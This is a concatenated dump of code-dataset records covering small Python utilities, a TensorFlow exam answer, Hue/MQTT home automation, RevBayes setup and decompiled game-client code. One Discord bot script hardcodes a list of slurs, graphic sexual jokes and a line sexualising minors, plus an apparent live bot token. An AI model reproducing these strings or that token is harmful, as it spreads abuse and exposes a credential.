item\n","sub_path":"spider/spiders/detailspider.py","file_name":"detailspider.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"316975758","text":"def bag_of_words(text):\n bow=dict()\n for w in text.split(' '):\n if w in bow.keys():\n bow[w]+=1\n else:\n bow[w]=1\n return bow\n\ntest_text = 'the quick brown fox jumps over the lazy dog'\n\nprint(bag_of_words(test_text))","sub_path":"intro-to-tflearn/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"13536498","text":"# ======================================================================\n# There are 5 questions in this exam with increasing difficulty from 1-5.\n# Please note that the weight of the grade for the question is relative\n# to its difficulty. So your Category 1 question will score significantly\n# less than your Category 5 question.\n#\n# Don't use lambda layers in your model.\n# You do not need them to solve the question.\n# Lambda layers are not supported by the grading infrastructure.\n#\n# You must use the Submit and Test button to submit your model\n# at least once in this category before you finally submit your exam,\n# otherwise you will score zero for this category.\n# ======================================================================\n#\n# Computer Vision with CNNs\n#\n# Build a classifier for Rock-Paper-Scissors based on the rock_paper_scissors\n# TensorFlow dataset.\n#\n# IMPORTANT: Your final layer should be as shown. Do not change the\n# provided code, or the tests may fail\n#\n# IMPORTANT: Images will be tested as 150x150 with 3 bytes of color depth\n# So ensure that your input layer is designed accordingly, or the tests\n# may fail. \n#\n# NOTE THAT THIS IS UNLABELLED DATA. \n# You can use the ImageDataGenerator to automatically label it\n# and we have provided some starter code.\n\n\nimport urllib.request\nimport zipfile\nimport tensorflow as tf\nfrom keras_preprocessing.image import ImageDataGenerator\nimport tensorflow\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten, \\\n Dense,Activation, BatchNormalization\nfrom keras.utils import to_categorical\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\nfrom keras.optimizers import Adam\n\nfrom sklearn.model_selection import train_test_split\n\nes=EarlyStopping(\n patience=10,\n verbose=1,\n monitor='val_loss'\n)\n\nrl=ReduceLROnPlateau(\n patience=5,\n verbose=1,\n factor=0.5,\n monitor='val_loss'\n)\n\ndef solution_model():\n url = 'https://storage.googleapis.com/download.tensorflow.org/data/rps.zip'\n urllib.request.urlretrieve(url, 'rps.zip')\n local_zip = 'rps.zip'\n zip_ref = zipfile.ZipFile(local_zip, 'r')\n zip_ref.extractall('tmp/')\n zip_ref.close()\n\n TRAINING_DIR = \"tmp/rps/\"\n training_datagen = ImageDataGenerator(\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=0.1,\n horizontal_flip=True,\n vertical_flip=True,\n rescale=1./255,\n validation_split=0.2\n )\n\n validation_datagen=ImageDataGenerator(\n rescale=1./255,\n validation_split=0.2\n )\n # YOUR CODE HERE\n\n train_generator=training_datagen.flow_from_directory(\n 'tmp/rps/',\n subset='training',\n batch_size=32,\n target_size=(150, 150),\n ) # YOUR CODE HERE\n\n val_generator=validation_datagen.flow_from_directory(\n 'tmp/rps/',\n subset='validation',\n batch_size=32,\n target_size=(150, 150)\n )\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, 2, padding='same', input_shape=(150, 150, 3)),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(128, 2, padding='same'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(128, 3),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n # YOUR CODE HERE, BUT END WITH A 3 Neuron Dense, activated by softmax\n tf.keras.layers.Dense(3, activation='softmax')\n ])\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer=Adam(\n learning_rate=0.001\n ),\n metrics='acc'\n )\n\n model.fit(\n train_generator,\n validation_data=val_generator,\n epochs=300,\n batch_size=32,\n callbacks=[es, rl]\n )\n\n loss=model.evaluate(\n val_generator\n )\n\n print('loss : ', loss[0])\n print('acc : ', loss[1])\n\n return model\n\n\n# Note that you'll need to save your model as a .h5 like this.\n# When you press the Submit and Test button, your saved .h5 model will\n# be sent to the testing infrastructure for scoring\n# and the score will be returned to you.\nif __name__ == '__main__':\n model = solution_model()\n model.save(\"mymodel3.h5\")\n","sub_path":"AI/Study_self/tf_certificate/Category3/starter3_answer.py","file_name":"starter3_answer.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"480890441","text":"import discord\r\nfrom discord.ext import commands\r\nimport sys\r\nimport discord\r\nimport time\r\nimport sys\r\nimport os\r\nimport random\r\nimport subprocess\r\nimport traceback\r\nfrom discord import errors\r\nimport json\r\nimport random\r\nbot = commands.Bot(command_prefix=\"ik\", description=\"Discripto\")\r\ntry:\r\n\tbot.load_extension(\"REPL\")\r\nexcept:\r\n\tprint(\"Hmm\")\r\n###NSFW ALERT\r\na= [\"i fuck my teddy bear and cum in it\",\r\n\"reaxt im going to shove a football down your nosetril\",\r\n\"hows it hangin? from a string probably\",\"*ping* while u were slurping pussy from a bendy straw i studied the blade\",\r\n\"i was in a good mood laughing at stupid as fuck deaths then 11 year old cancer child's last moments happend\",\"why does it look like electricity is coming out of their dick\",\"horsecock tho :heart:\",\"*ping* THAT DOES IT FAGGOT! IM NOT A FURRY OR CLOSET FURRY! SHUT THE FUCK UP! EAT ASS AND DIE!\",\"Hey faggots you can buy yourself dragon dildos 40% off tomorrow\",\r\n\"Oh no I need my underage boobies !!!\",\r\n\"Paul Blart: Mall Cop is my favorite movie\",\r\n\"Does anyone here know how to download club penguin?\",\r\n\"shes gonna find your dirty mageziens\",\"bedroom? if you insist. i mean you are pretty cute. he took my hand, i blush deeply. as we walk to the bedroom. i pull out my bad dick. wow i thought you were a lady. well, whatever works!! narrator it didnt work. its ok my surgeon is the best my surgeon did a good job on me. i was once a dog. conveniently, he identifies as a dogkin. wow thats quite a surprise you know what else is surprising? he had a 13 inch dog penis it was red and everything, but like as a joke anyways i fucked it. my parents are really proud of him for that massive honk they were also happy with my ability to take such a massive dog... to think i was gay before( now im mega gay!)\",\r\n\" named the image of the citadel nigger.jpg\",\"```make a website like real people``` this server is to use the bots, you cant do that on websites\",\r\n\"im wating the security cams in a chinese nursing home lobby\",\"node.js more like nude.js\",\"If Im going to blow a man, Id like to have his dick wrapped in a hot dog bun\",\r\n\"should be called baka\",\r\n\"ASIANBOI\",\r\n\"if ma girl ever cheats on me ill stick her to a chair and make her watch me have sex with the guy who cheated on me with\",\r\n\"Your midget spunnerr spun for 3 minutes 12 seconds. Congratulations, you now have asshole cancer\",\r\n\"Pls stop i have miniophobia\"]\r\n###NFSW END\r\n@bot.command()\r\nasync def nsfw(ctx):\r\n \"\"\"Its NSFW ;-)\"\"\"\r\n await ctx.send(random.choice(a))\r\n###NSFW END\r\n\r\n@bot.command()\r\nasync def yeet(ctx):\r\n \"\"\"Sends a simple Hello Message\"\"\"\r\n await ctx.send(\"Sup!!\")\r\n@bot.command()\r\nasync def mime(ctx, *, something):\r\n await ctx.send(something)\r\n#bot.remove_command('help')\r\n#@bot.command()\r\n#async def help(ctx):\r\n\t#await ctx.send(\"Figure it out Yourself!\")\r\n@bot.command()\r\nasync def cult(ctx, member: discord.User):\r\n await member.send(\"Wanna Join the Illuminati?\")\r\n@bot.command()\r\nasync def shout(ctx):\r\n\tawait ctx.send(ctx.author.mention)\r\n@bot.command()\r\nasync def mention(ctx):\r\n await ctx.author.send(ctx.author.mention)\r\n@bot.event\r\nasync def on_member_join(member):\r\n guild = member.guild\r\n await member.send(\"Welcome to {}!\".format(guild.name))\r\n\r\n@bot.command()\r\nasync def add(ctx,a,b):\r\n\tc=int(a)+int(b)\r\n\tawait ctx.send(c)\r\n\r\n@bot.event\r\nasync def on_command_error(ctx, exception):\r\n\tif type(exception) is commands.errors.CommandNotFound:\r\n\t\tawait ctx.send(\"Cant do that mate\")\r\n\tif type(exception) is commands.errors.MissingRequiredArgument:\r\n\t\tawait ctx.send(\"You are missing Arguments there buddy!\")\r\ndef check(ctx):\r\n return ctx.message.author.id == 199129403458977792\r\n\r\n@bot.command()\r\n@commands.check(check)\r\nasync def owner(ctx):\r\n await ctx.send('Thanks for making me!')\r\n\r\n@bot.command()\r\n@commands.has_any_role('Sigurd', 'Jacques', 'DR', 'beebee', 'chokkers delight', 'Alexa', 'Lava', 'Norway', 'jacob', 'couch', 'Brutally', 'Hunt', 'Cops', 'bob', 'DJ V/SA', 'Alena', 'new role', 'Shrew', 'Tequila', 'Xam', 'Karlie', 'Monday Meme', 'musik', 'Usagirl', 'Batman', 'Random', 'Octavia', 'Pikachu', 'Jacq', 'Perolina', 'soul', 'Riddle Honor', 'Mallu', 'Bots', 'Dark Kun', 'Labeeb', 'Pain', 'Pop', 'DJ','Members')\r\nasync def cool(ctx):\r\n await ctx.send('You are cool indeed')\r\n@bot.command()\r\nasync def embed(ctx,title,text):\r\n\tawait ctx.send(embed=discord.Embed(title=title,description=text,colour=discord.Colour(0xFF000)))\r\n\r\nemo=\":regional_indicator_\"\r\nji=\":\" \r\ncat=\"\"\r\n@bot.command()\r\nasync def emote(ctx,word):\r\n\tcat=\"\"\r\n\tfor i in word:\r\n\t\ti=emo+i+ji\r\n\t\tcat=cat+i\r\n\tawait ctx.send(cat)\r\n\t\r\nbot.run(\"NDM0MDE5OTc4Nzg2ODk3OTMw.DbJaAg.ZMYTYDeGStoTJwsBpLBa8LD8cow\") \r\n\r\n\r\n\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"273624651","text":"#https://github.com/studioimaginaire/phue\n\n\n#https://pypi.python.org/pypi/paho-mqtt/1.1\nimport paho.mqtt.client as mqtt\nimport json\nfrom phue import Bridge\n#just to get host name\nimport socket \nfrom time import sleep\nimport time\nfrom math import ceil\nimport logging as log\nimport sys,os\nimport cfg\nfrom mqtt import mqtt_start\nimport threading\nimport time\n\ndef debounce(in_time):\n current_time = time.time()\n delta = current_time - in_time\n return (delta > 2),current_time\n\ndebounce_1_prev = 0\ndef debounce_1():\n global debounce_1_prev\n res,debounce_1_prev = debounce(debounce_1_prev)\n return res\n\ndebounce_2_prev = 0\ndef debounce_2():\n global debounce_2_prev\n res,debounce_2_prev = debounce(debounce_2_prev)\n return res\n\ndebounce_3_prev = 0\ndef debounce_3():\n global debounce_3_prev\n res,debounce_3_prev = debounce(debounce_3_prev)\n return res\n\ndef bed_light_button(payload):\n if(debounce_1()):\n log.debug(\"bed_light_button> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n if(lights[\"Bed Malm\"].on):\n lights[\"Bed N\"].on = False\n lights[\"Bed Malm\"].on = False\n lights[\"Bed W\"].on = False\n log.debug(\"bed_light_button> set light off\")\n else:\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Bed Malm\", {'on' : True, 'bri' : 254})\n b.set_light(\"Bed N\", {'on' : True, 'bri' : 254})\n b.set_light(\"Bed W\", {'on' : True, 'bri' : 254})\n log.debug(\"bed_light_button> set light to MAX\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"Bed Malm\", {'on' : True, 'bri' : 1})\n lights[\"Bed N\"].on = False\n lights[\"Bed W\"].on = False\n log.debug(\"bed_light_button> set light to min\")\n #else:\n #log.debug(\"bed_light_button> debounced\")\n return\n\ndef bathroom_shelly_light(cmd):\n topic = \"shellies/shellyswitch25-B8A4EE/relay/0/command\"\n clientMQTT.publish(topic,cmd)\n log.debug(f\"set_light_relay> to {cmd}\")\n return\n\ndef bathroom_light_hue():\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n log.debug(\"bathroom_light_hue> set light to min\")\n return\n\ndef bathroom_light_button(payload):\n if(debounce_2()):\n log.debug(\"bathroom light> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n #state = b.get_light(\"Bathroom main\")\n #if(not state[\"state\"][\"reachable\"]):\n bathroom_shelly_light(\"on\")\n threading.Timer(1, bathroom_light_hue).start()\n #else:\n # if(lights[\"Bathroom main\"].on):\n # lights[\"Bathroom main\"].on = False\n # log.debug(\"bathroom light> set light off\")\n # else:\n # b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n # log.debug(\"bathroom_light_button> set light to min\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n log.debug(\"bathroom light> set light to min\")\n return\n\ndef livroom_light_button(payload):\n if(debounce_3()):\n log.debug(\"living room light> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n if(lights[\"LivingTop5\"].on):\n lights[\"LivingTop1\"].on = False\n lights[\"LivingTop2\"].on = False\n lights[\"LivingTop3\"].on = False\n lights[\"LivingTop4\"].on = False\n lights[\"LivingTop5\"].on = False\n log.debug(\"living room light> set light off\")\n else:\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"LivingTop1\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop2\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop3\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop4\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop5\", {'on' : True, 'bri' : 254})\n log.debug(\"living room light> set light to MAX\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"LivingTop1\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop2\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop3\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop4\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop5\", {'on' : True, 'bri' : 1})\n log.debug(\"living room light> set light to min\")\n return\n\ndef office_switch(payload):\n switch = json.loads(payload)\n if(\"click\" in switch and switch[\"click\"] == \"single\"):\n if(lights[\"Office main\"].on):\n lights[\"Office main\"].on = False\n log.debug(\"office_light> off\")\n else:\n #command so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Office main\", {'on' : True, 'bri' : 255})\n log.debug(\"office_light> on\")\n elif(\"action\" in switch and switch[\"action\"] == \"hold\"):\n b.set_light(\"Office main\", {'on' : True, 'bri' : 1})\n log.debug(\"office_light> low\")\n #else:\n # log.debug(\"office_light>no click\")\n return\n\ndef entrance_light(payload):\n jval = json.loads(payload)\n if(\"click\" in jval and jval[\"click\"] == \"single\"):\n if(lights[\"Entrance White 1\"].on):\n lights[\"Entrance White 1\"].on = False\n lights[\"Entrance White 2\"].on = False\n log.debug(\"entrance_light> off\")\n else:\n #command so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Entrance White 1\", {'on' : True, 'bri' : 255})\n b.set_light(\"Entrance White 2\", {'on' : True, 'bri' : 255})\n log.debug(\"entrance_light> on\")\n elif(\"contact\" in jval and jval[\"contact\"] == False):\n #TODO check brightness here - and diff between coming or going away\n log.debug(\"entrance_door>open\")\n else:\n log.debug(\"entrance_light>no click\")\n return\n\ndef mqtt_on_message(client, userdata, msg):\n try:\n topic_parts = msg.topic.split('/')\n if(len(topic_parts) == 2):\n name = topic_parts[1]\n if(name == \"bed light button\") or (name == \"bed nic button\"):\n bed_light_button(msg.payload)\n elif(name == \"office switch\"):\n office_switch(msg.payload)\n elif(name == \"tree button\"):\n bathroom_light_button(msg.payload)\n elif(name == \"liv light 1 button\"):\n livroom_light_button(msg.payload)\n else:\n log.error(\"topic: \"+msg.topic + \"size not matching\")\n except Exception as e:\n log.error(\"mqtt_on_message> Exception :%s\"%e)\n return\n\n# -------------------- main -------------------- \nconfig = cfg.configure_log(__file__)\n\n# -------------------- Philips Hue Client -------------------- \nlog.info(\"Check Bridge Presence\")\n\nif(cfg.ping(config[\"bridges\"][\"LivingRoom\"])):\n b = Bridge(config[\"bridges\"][\"LivingRoom\"])\n log.info(\"Bridge Connection\")\n b.connect()\n log.info(\"Light Objects retrieval\")\n lights = b.get_light_objects('name')\n log.info(\"Hue Lights available :\")\n for name, light in lights.items():\n log.info(name)\n \nelse:\n log.info(\"Bridge ip not responding\")\n\n\n# -------------------- Mqtt Client -------------------- \n#will start a separate thread for looping\nclientMQTT = mqtt_start(config,mqtt_on_message,True)\n\nwhile(True):\n sleep(0.2)\n #The MQTT keeps looping on a thead\n #All there is to do here is not to exit\n","sub_path":"raspi/hue/hue.py","file_name":"hue.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"145120327","text":"#! /usr/bin/env python\n\nimport os\nimport glob\nimport shutil \nimport itertools\nimport re \n\n# requires a main folder with:\n# nexusFiles - folder containing all nexus files to run\n# rb_scripts - folder with all rev scripts to run. pbs script. MCMC. Model. and emp analysis script\n\n# Make folders for each locus and put nexus file into inner \"data\" folder\ndef makeFolders(n, suffix, mainDir):\n\tnexus=str(n)\n\tnexusIndex = nexus.find(suffix)\n\tfName = nexus[:nexusIndex]\n\tdirPath = os.path.join(mainDir,fName)\n\t\n\t# Create paths \n\tdirPath = os.path.join(mainDir,fName)\n\tdataPath = os.path.join(mainDir,fName,\"data\")\n\n\t# Make directories\n\tif not os.path.exists(dirPath):\n\t\tos.mkdir(dirPath)\t\n\tif not os.path.exists(dataPath):\n\t\tos.mkdir(dataPath)\t\n\n\t# Copy nexus to data folder\n\tos.system(\"rm %s\" % (dataPath+\"/\"+n))\n\tprint(n)\n\tos.system(\"cp %s %s\" % (n,dataPath))\n\treturn dirPath,fName\n\ndef editFile(file,old,new):\n\twith open(file, \"r+\") as f:\n\t\t\tfiledata = f.read()\n\t\t\tfiledata = re.sub(old,str(new), filedata)\n\t\t\tf.seek(0)\n\t\t\tf.write(filedata)\n\t\t\tf.truncate()\n\ndef setup(mainDir,suffix,folders = False):\n\tscriptDir = os.path.join(mainDir,\"rb_scripts/\")\n\tos.chdir(mainDir)\n\tfor n in glob.glob('*%s' % suffix):\n\t\tif folders == True:\n\t\t\tx = makeFolders(n, suffix, mainDir)\n\t\t\tdirPath = x[0]\n\t\t\tfName = x[1] \n\t\telse:\n\t\t\tnexus=str(n)\n\t\t\tnexusIndex = nexus.find(suffix)\n\t\t\tfName = nexus[:nexusIndex]\n\t\t\tdirPath = os.path.join(mainDir,fName)\n\t\t# make folder for rev scripts\n\t\tscriptPath = os.path.join(dirPath,\"scripts/\")\n\t\tif not os.path.exists(scriptPath):\n\t\t\tos.mkdir(scriptPath)\t\n\t\t# Copy RevBayes scripts folder to gene script folder\n\t\tos.system(\"cp -r %s/* %s\" % (scriptDir, scriptPath))\n\t\tos.chdir(scriptPath)\n\t\teditFile(\"emp_analysis.Rev\",\"tacocat\",fName)\n\t\teditFile(\"emp_analysis.Rev\",\"racecar\",suffix)\n\t\teditFile(\"job_emp_rb.pbs\",\"tacocat\",fName)\n\t\t# Move pbs script up a folder\n\t\tos.system(\"mv job_emp_rb.pbs %s\" % (dirPath))\n\t\tos.chdir(mainDir)\n\n\n\nmainDir=os.getcwd()\nsetup(mainDir,\".ntg.nex\",True)\n\n","sub_path":"GeneTree_RevBayes/emp_setup.py","file_name":"emp_setup.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"449545039","text":"'''\nConvert excel column names to integers and vice-versa\n'''\n\nfrom string import ascii_uppercase\n\ndef xlcol2num(x):\n '''\n >>> xlcol2num('A')\n 1\n >>> xlcol2num('AA')\n 27\n >>> xlcol2num('KN')\n 300\n >>> xlcol2num('DKJ')\n 3000\n >>> xlcol2num('GJH')\n 5000\n '''\n if list(x) != [c for c in x if c in ascii_uppercase]:\n raise ValueError('Invalid excel column')\n return reduce(lambda s, a: s * 26 + ord(a) - ord('A') + 1, x, 0)\n\ndef num2xlcol(n):\n '''\n >>> num2xlcol(1)\n u'A'\n >>> num2xlcol(27)\n u'AA'\n >>> num2xlcol(300)\n u'KN'\n >>> num2xlcol(3000)\n u'DKJ'\n >>> num2xlcol(5000)\n u'GJH'\n '''\n if type(n) != int:\n raise ValueError('index must be an integer')\n if n < 1:\n raise ValueError('Index is too small')\n result = \"\"\n while True:\n if n > 26:\n n, r = divmod(n - 1, 26)\n result = chr(r + ord('A')) + result\n else:\n return unicode(chr(n + ord('A') - 1) + result)\n","sub_path":"xlsx/xlcols.py","file_name":"xlcols.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"307276001","text":"\"\"\"\ninput: weights = [ 4, 6, 10, 15, 16 ], length = 5, limit = 21\noutput: [ 3, 1 ] # since these are the indices of weights 15 and 6 whose sum equals 21\n\"\"\"\n\ndef get_indices_of_item_weights(weights, _, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n weight_table = {}\n\n # build table of k=weight v=[idxs]\n for idx, weight in enumerate(weights):\n # because there may be items of the same weight, the index is stored in an array\n if weight not in weight_table:\n weight_table[weight] = [idx] # first\n else:\n weight_table[weight].append(idx) # additional (only need two of them via rules)\n\n # loop again trying to locate the matching weight\n for weight in weights:\n needed_weight = limit - weight\n \n # special case for items with the same weight\n if needed_weight == weight and len(weight_table[weight]) > 1:\n idx1 = weight_table[weight][1] # this idx is always larger\n idx2 = weight_table[weight][0]\n return (idx1, idx2)\n \n if needed_weight in weight_table:\n if weight + needed_weight == limit:\n # found the 2nd weight\n idx1 = weight_table[weight][0]\n idx2 = weight_table[needed_weight][0]\n if idx1 > idx2: # don't understand the purpose of this rule but ok\n return (idx1, idx2)\n else:\n return (idx2, idx1)\n\n return None","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"479575750","text":"import csv\nimport spotipy\n\nUNIQUE_ALBUMS_FNAME = 'billboard_albums_unique.csv'\nALBUMS_OUT_FNAME = 'unique_albums_exact_matches.csv'\n\ndef search_for_artist(artist, sp):\n artist_search = sp.search(artist, type='artist')\n\n best_artist_match = None\n\n for artist_result in artist_search['artists']['items']:\n res_name = artist_result['name'].lower()\n if artist.lower() == res_name:\n # this is our artist\n best_artist_match = artist_result\n break\n\n if best_artist_match is None:\n # then we're done\n return None\n\n artist_id = best_artist_match['id']\n\n return artist_id\n\ndef search_through_artist_for_album(artist_id, album, sp):\n albums_search = sp.artist_albums(artist_id,\n album_type='album',\n country='US')\n\n best_album_match = None\n for album_result in albums_search['items']:\n res_name = album_result['name'].lower()\n if album.lower() == res_name:\n best_album_match = album_result\n break\n\n if best_album_match is None:\n return None\n\n album_id = best_album_match['id']\n\n return album_id\n\nif __name__ == '__main__':\n\n all_artist_ids = {}\n\n sp = spotipy.Spotify()\n\n with open(UNIQUE_ALBUMS_FNAME) as f:\n freader = csv.reader(f)\n header = freader.next()\n\n with open(ALBUMS_OUT_FNAME,'w') as fout:\n fwriter = csv.writer(fout)\n headerout = header + ['artist.id','album.id']\n fwriter.writerow(headerout)\n\n for row in freader:\n artist_name = row[header.index('artist')]\n album_name = row[header.index('album')]\n\n try: artist_id = all_artist_ids[artist_name]\n except KeyError:\n artist_id = search_for_artist(artist_name, sp)\n all_artist_ids[artist_name] = artist_id\n\n if artist_id is None:\n fwriter.writerow(row)\n continue\n\n album_id = search_through_artist_for_album(artist_id,\n album_name,\n sp)\n\n if album_id is None:\n album_id = ''\n\n rowout = row + [artist_id, album_id]\n fwriter.writerow(rowout)\n","sub_path":"search_spotify.py","file_name":"search_spotify.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"617861940","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\neocom\\corporation\\corp_ui_applications.py\nfrom math import pi\nfrom carbonui.primitives.container import Container\nfrom eve.client.script.ui.control import entries as listentry\nfrom carbonui.control.scrollentries import SE_BaseClassCore\nfrom eve.client.script.ui.control.buttons import Button\nfrom eve.client.script.ui.control.eveLabel import EveLabelMedium\nfrom eve.client.script.ui.control.infoIcon import MoreInfoIcon\nimport uicls\nimport carbonui.const as uiconst\nimport uiprimitives\nimport uicontrols\nimport uiutil\nimport localization\nimport base\nimport eve.common.lib.appConst as const\nAPPLICATION_STATUS_LABELNAMES = {const.crpApplicationAppliedByCharacter: 'UI/Corporations/CorpApplications/ApplicationUnprocessed',\n const.crpApplicationAcceptedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusInvited',\n const.crpApplicationRejectedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusRejected',\n const.crpApplicationAcceptedByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusAccepted',\n const.crpApplicationRejectedByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusInvitationRejected',\n const.crpApplicationWithdrawnByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusWithdrawn',\n const.crpApplicationInvitedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusDirectlyInvited'\n }\nSTATUS_SETTING_NAME = 'applicationStatus_%d'\n\nclass ApplicationsWindow(uiprimitives.Container):\n __guid__ = 'uicls.ApplicationsTab'\n __nonpersistvars__ = []\n\n def ApplyAttributes(self, attributes):\n uiprimitives.Container.ApplyAttributes(self, attributes)\n self.ownerID = attributes.ownerID\n if self.ownerID == session.charid:\n self.myView = True\n else:\n self.myView = False\n self.quickFilterSetting = 'applicationsQuickFilter_OwnerID%s' % self.ownerID\n self.filteringBy = settings.char.ui.Get(self.quickFilterSetting, '')\n self.showingOld = settings.char.ui.Get('applicationsShowOld_%s' % self.ownerID, False)\n self.InitViewingStatus()\n self.topContainer = uiprimitives.Container(parent=self, name='topContainer', align=uiconst.TOTOP, height=20, padding=const.defaultPadding)\n self.quickFilter = uicls.QuickFilterEdit(parent=self.topContainer, align=uiconst.CENTERRIGHT, setvalue=self.filteringBy)\n self.quickFilter.ReloadFunction = self.OnSearchFieldChanged\n self.quickFilter.OnReturn = self.SearchByCharacterName\n self.statusFilter = uicls.UtilMenu(parent=self.topContainer, align=uiconst.CENTERRIGHT, padding=(1,\n 1,\n 1,\n 1), left=103, GetUtilMenu=self.StatusFilterMenu, texturePath='res:/ui/texture/icons/38_16_205.png', hint=localization.GetByLabel('UI/Corporations/CorpApplications/FilterByStatus'))\n self.inviteButton = Button(name='inviteButton', align=uiconst.CENTERLEFT, parent=self.topContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/InviteToCorp'), func=self.OpenInviteWindow)\n if not const.corpRolePersonnelManager & session.corprole == const.corpRolePersonnelManager:\n self.inviteButton.display = False\n if self.myView:\n self.topContainer.display = False\n self.applicationContainer = uiprimitives.Container(name='applications', parent=self, align=uiconst.TOALL, padding=const.defaultPadding)\n self.applicationScroll = uicontrols.BasicDynamicScroll(name='applicationsScroll', parent=self.applicationContainer, align=uiconst.TOALL, noContentHint=localization.GetByLabel('UI/Corporations/CorpApplications/NoApplicationsFound'))\n self.applicationScroll.multiSelect = 0\n\n def OpenInviteWindow(self, *args):\n InviteToCorpWnd.CloseIfOpen('InviteToCorpWnd')\n InviteToCorpWnd.Open()\n\n def GetApplications(self, statusList=None):\n if statusList is None:\n statusList = self.sr.viewingStatus\n filteredApplications = []\n if self.ownerID == session.corpid:\n if const.corpRolePersonnelManager & session.corprole != const.corpRolePersonnelManager:\n return []\n if self.showingOld:\n applications = sm.GetService('corp').GetOldApplicationsWithStatus(statusList)\n else:\n applications = sm.GetService('corp').GetApplicationsWithStatus(statusList)\n if len(self.filteringBy):\n ownersToPrime = set()\n for application in applications:\n ownersToPrime.add(application.characterID)\n\n if len(ownersToPrime) > 0:\n cfg.eveowners.Prime(ownersToPrime)\n for application in applications:\n if cfg.eveowners.Get(application.characterID).name.lower().find(self.filteringBy.lower()) > -1:\n filteredApplications.append(application)\n\n else:\n filteredApplications = applications\n elif self.showingOld:\n filteredApplications = sm.GetService('corp').GetMyOldApplicationsWithStatus(None)\n else:\n filteredApplications = sm.GetService('corp').GetMyApplicationsWithStatus(None)\n return filteredApplications\n\n def GetCorpApplicationEntries(self, applications):\n ownersToPrime = set()\n scrolllist = []\n if self.myView:\n ownerKey = 'corporationID'\n else:\n ownerKey = 'characterID'\n validApplications = set()\n for application in applications:\n ownerID = getattr(application, ownerKey, None)\n if ownerID is None:\n continue\n ownersToPrime.add(ownerID)\n validApplications.add(application)\n\n if len(ownersToPrime):\n cfg.eveowners.Prime(ownersToPrime)\n expandedApp = settings.char.ui.Get('corporation_applications_expanded', {})\n for application in validApplications:\n data = {'myView': self.myView,'application': application,'sort_%s' % localization.GetByLabel('UI/Common/Date'): application.applicationDateTime,'charID': application.characterID,'isExpanded': expandedApp.get(self.myView, None) == application.applicationID}\n entry = listentry.Get('CorpApplicationEntry', data)\n scrolllist.append(entry)\n\n return scrolllist\n\n def OnSearchFieldChanged(self):\n 